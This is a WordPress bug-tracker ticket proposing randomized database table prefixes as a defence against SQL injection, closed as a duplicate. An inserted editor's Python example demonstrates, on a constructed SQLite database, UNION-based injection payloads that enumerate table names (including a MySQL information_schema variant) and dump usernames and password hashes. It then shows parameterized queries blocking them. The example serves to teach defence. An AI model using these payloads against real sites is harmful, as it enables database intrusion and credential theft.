Make WordPress Core

Opened 4 years ago

Closed 4 years ago

Last modified 4 years ago

#17966 closed enhancement (duplicate)

Automatic table name randomization for improved security

Reported by: hexley
Owned by:
Milestone:
Priority: normal
Severity: normal
Version: 3.2
Component: General
Keywords:
Focuses:
Cc:

Description

With the recent security exploits leaving users' logins and passwords leaked into the open, I was thinking that perhaps there may be a way to make SQL injection attacks more challenging for the hackers.

The table names within WP are widely known. Certainly, they can be changed, but that is something I rarely see done, and takes user intervention. The current default table naming convention is wp-table_name.

On a new installation, perhaps it could be created so that table names take the form of:
wp-rand(0,2)-table_name

The random bits would be known, and could be easily included in the config file, or the config file data that a user copies and pastes.

This would add one additional layer of information that a would-be hacker needs to know in order to act against the database with an SQL injection style attack. It definitely does not cover all aspects, as there is still a chance for update, delete, and insert to be issued against known page IDs; however, injecting a drop, rename, download, or other larger operation would now essentially be password protected.

While the rand() part may not be terribly long, it should be enough of a deterrent that the hacker gives up and moves along to an easier target. I understand this is merely security by obscurity, but for the rather simple implementation versus the payoff in challenge it imposes on the hacker, I feel it is worth it. I don't see a downside, and while we would all like to not have to deal with workarounds such as this, with open source code and rapid releases leaving users running old/legacy code, this could add that one small layer that protects those users a bit more than nothing.

Thanks for your consideration.
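Editor's added example (not part of the ticket, and not WordPress code): the proposal above assumes an injecting attacker must already know the table names. In practice the database catalogue gives them away: an attacker who can inject one query can read the table list (sqlite_master in SQLite, information_schema.tables in MySQL) and learn the random prefix before touching any table. The script below builds a constructed in-memory SQLite database with a randomized prefix, runs a string-concatenated query of the kind a careless plugin might issue, recovers the prefix through it, dumps the constructed users table, and then shows that the same payload does nothing against a parameterized query. The `random_prefix` scheme, table layout and sample rows are assumptions made for the example; WordPress itself takes its prefix from `$table_prefix` in wp-config.php.

```python
import secrets
import sqlite3


def random_prefix() -> str:
    """Hypothetical prefix scheme in the spirit of the ticket: 'wp_' plus 24 random
    bits in hex, e.g. 'wp_3fa9c1_'. Stands in for $table_prefix in wp-config.php."""
    return "wp_" + secrets.token_hex(3) + "_"


def build_db(prefix: str) -> sqlite3.Connection:
    """Constructed in-memory database with two tables named like WordPress's users
    and posts tables under the given prefix. The rows are made-up sample data."""
    con = sqlite3.connect(":memory:")
    con.execute(f"CREATE TABLE {prefix}users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    con.execute(f"CREATE TABLE {prefix}posts (ID INTEGER PRIMARY KEY, post_title TEXT)")
    con.execute(f"INSERT INTO {prefix}users VALUES (1, 'admin', '$P$Bconstructedhash')")
    con.execute(f"INSERT INTO {prefix}posts VALUES (1, 'Hello world')")
    con.commit()
    return con


def get_post_title_vulnerable(con, prefix, post_id):
    # Vulnerable pattern: the untrusted post_id is concatenated into the statement.
    sql = f"SELECT post_title FROM {prefix}posts WHERE ID = {post_id}"
    return [row[0] for row in con.execute(sql)]


def get_post_title_safe(con, prefix, post_id):
    # Hardened form: the prefix is still server-controlled, but post_id is bound as
    # a parameter and can never become SQL (in WordPress terms: $wpdb->prepare()).
    sql = f"SELECT post_title FROM {prefix}posts WHERE ID = ?"
    return [row[0] for row in con.execute(sql, (post_id,))]


# Payload sent as post_id. It asks the catalogue for every table name, so the
# attacker needs no knowledge of the prefix. SQLite keeps the catalogue in
# sqlite_master; the MySQL equivalent (what WordPress runs on) would be:
#   0 UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()
ENUMERATE_TABLES = "0 UNION SELECT name FROM sqlite_master WHERE type='table'"


def steal_credentials(con, prefix):
    """Run the two-step attack against the vulnerable query; return what it learns."""
    # Step 1: learn the table names, and with them the random prefix.
    tables = get_post_title_vulnerable(con, prefix, ENUMERATE_TABLES)
    users_table = next(t for t in tables if t.endswith("users"))
    discovered_prefix = users_table[: -len("users")]
    # Step 2: use the discovered name to read logins and password hashes.
    dump = f"0 UNION SELECT user_login || ':' || user_pass FROM {users_table}"
    creds = get_post_title_vulnerable(con, prefix, dump)
    return discovered_prefix, creds


def demo():
    prefix = random_prefix()
    con = build_db(prefix)
    discovered, creds = steal_credentials(con, prefix)
    # Against the parameterized query the same payload is just an ID that matches nothing.
    blocked = get_post_title_safe(con, prefix, ENUMERATE_TABLES)
    return {"prefix": prefix, "discovered": discovered, "creds": creds, "blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

Running it shows `discovered` equal to the freshly generated `prefix` on every run: the randomization costs the attacker one extra query, not a password's worth of guessing. The only line that actually stops the attack is the bound parameter in `get_post_title_safe`, which works regardless of what the prefix is.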

Change History (2)

comment:1 @ocean90 4 years ago

  • Milestone Awaiting Review deleted
  • Resolution set to duplicate
  • Status changed from new to closed

comment:2 @hebbet 4 years ago

Maybe WordPress should show a notice like this:
For better security, you should change wp_ to (random four letters here)_
